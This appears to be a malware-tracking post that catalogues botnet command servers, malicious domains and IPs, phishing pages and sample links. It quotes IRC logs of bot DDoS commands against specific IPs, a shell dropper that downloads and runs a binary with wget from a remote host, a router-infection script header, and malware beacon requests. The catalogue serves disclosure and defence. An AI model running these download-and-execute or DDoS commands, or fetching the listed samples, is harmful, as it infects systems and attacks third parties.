This is spreading through torrents and cracks and looks like a password stealer. Domains and IPs used: makemegood24.com 213.165.83.176 e710e2.makemegood24.com 87.106.20.192 aaakemegood24.com 146.148.34.125 ww11.aaakemegood24.com 166.78.106.200 abakemegood24.com 74.208.153.9 acakemegood24.com 87.106.20.192 adakemegood24.com 213.165.83.176 aeakemegood24.com 74.208.164.166 afakemegood24.com perfectchoice1.com
185.61.138.235(STD Botnet hosted in Ukraine Kiev Blazingfast Llc)
Another STD botnet found by abigail.
Server : 185.61.138.235
Port : 443
Channel : #secgod
DDOS Coming Up :
    <~Broken> >bot +std 70.127.120.174 80 30
    [STD]Hitting 70.127.120.174!
    [STD]Done hitting 70.127.120.174!
    <~Broken> >bot +stop
    Killing pid 13923.
Other url : http://93.174.93.45/f.sh
    #!/bin/sh
    cd /tmp && wget http://93.174.93.45/mosh && chmod +x mosh && ./mosh
    cd /tmp && wget http://93.174.93.45/mox64
191.235.178.122(Modified Kaiten+STD hosted in Ireland Dublin Microsoft Informatica Ltda)
Found by abigail
Server : 191.235.178.122
Port : 443
Channel : #sh
DDOS Coming Up lol :
    <~Haze> >bot +std 172.56.41.67 80 120
    [STD]Hitting 172.56.41.67!
    [STD]Hitting 172.56.41.67!
    [STD]Done hitting 172.56.41.67!
    [STD]Done hitting 172.56.41.67!
The Bot u can download it here.
Other : http://5.152.206.162/getbinaries.sh
    #!/bin/sh
    # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
    # UPLOAD GETBINARIES.SH IN YOUR
jdsiwiqweiqwyreqwi.com(Phishing malware hosted in Bosnia And Herzegovina Banja Luka Blicnet D.o.o.)
Domains used by the malware:
    34324325kgkgfkgf.com
    dsffdsk323721372131.com
    fdshjfsh324332432.com
    jdsiwiqweiqwyreqwi.com
    80.242.123.208
HTTP Requests:
URI: http://jdsiwiqweiqwyreqwi.com/dffgbDFGvf465/YYf.php
DATA:
    POST /dffgbDFGvf465/YYf.php HTTP/1.0
    Host: jdsiwiqweiqwyreqwi.com
    Accept: */*
    Accept-Encoding: identity, *;q=0
    Accept-Language: en-US
    Content-Length: 272
    Content-Type: application/octet-stream
    Connection: close
    Content-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
samples:
89.248.172.240(30k botnet hosted in Netherlands Amsterdam Ecatel Ltd)
Botnet found by sPy. Only the server and port, no channels here, because there is no exe file to look into for more. Feel free to check for channels yourself.
Connecting to 89.248.172.240 (6667)
    Invisible Users 12: 12 3554
    Operators: 2 operator(s) online
    Channels: 12 channels formed
    Clients: I have 3555 clients and 0 servers
    Local users: 3555 29989 Current local users
Linux Botnet Hosted In blackunix.us
This is the bot used to scan for vulnerabilities: hxxp://pastebin.com/dEMULiQV
    Now talking in #botnets
    Topic On : [ #botnets ] [ hajar irc.predone.cz dan irc.drogs.pl ]
    Topic By : [ uyap ]
    Modes On : [ #botnets ] [ +smntrMuk fcuked ]
The Bot is hosted here hxxp://visionafricamagazine.com/scripts/x.log
onetimes27s.com(Reverse Dns Bot hosted in Russian Federation Saint Petersburg Majordomo Llc)
This package was posted on a hacking board as an HTTP bot. After checking the file, here are the results:
Domains used :
    hoseen454r.com inactive
    onetimes27s.com active
Resolved : [ onetimes27s.com ] To [ 178.250.245.186 ]
Panel: hxxp://178.250.245.186/pref1/ password protected
Sample here
Hosting infos: http://whois.domaintools.com/178.250.245.186
btctycoon.net(Betabot hosted in Canada Montreal Ovh Hosting Inc.)
Thanks to Xylitol for infos.
Resolved : [btctycoon.net] To [192.99.21.12]
Other : hxxp://www.btctycoon.net/info/blah.php
Sample: hxxp://www.btctycoon.net/webapps/BTCclient.exe
Hosting Infos : http://whois.domaintools.com/192.99.21.12
static.onlineapplicationsdownloads.com(Trojan downloader spreading via Facebook hosted in United States Ashburn Amazon.com Inc.)
Our friend aLiSs found this file via Facebook. These links are spreading on Facebook:
    hxxp://goo.gl/TUqGzM
    hxxp://goo.gl/PVUW3S
    hxxp://goo.gl/uJvgqv
When u click, u go to the page and then u are asked to install FlvPlayer. If u click install, u are downloading FlvPlayerSetup.exe, which downloads and installs FlvPlayerSilent0.exe. These are domains used by this shit:
    os.greatonlineapplications.com
    static.onlineapplicationsdownloads.com
informed.su(Paypal Phishing Page)
I was looking into the spam area in my Gmail account and I saw this message:
    Update Personal Information
    Dear Valued Customer, It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on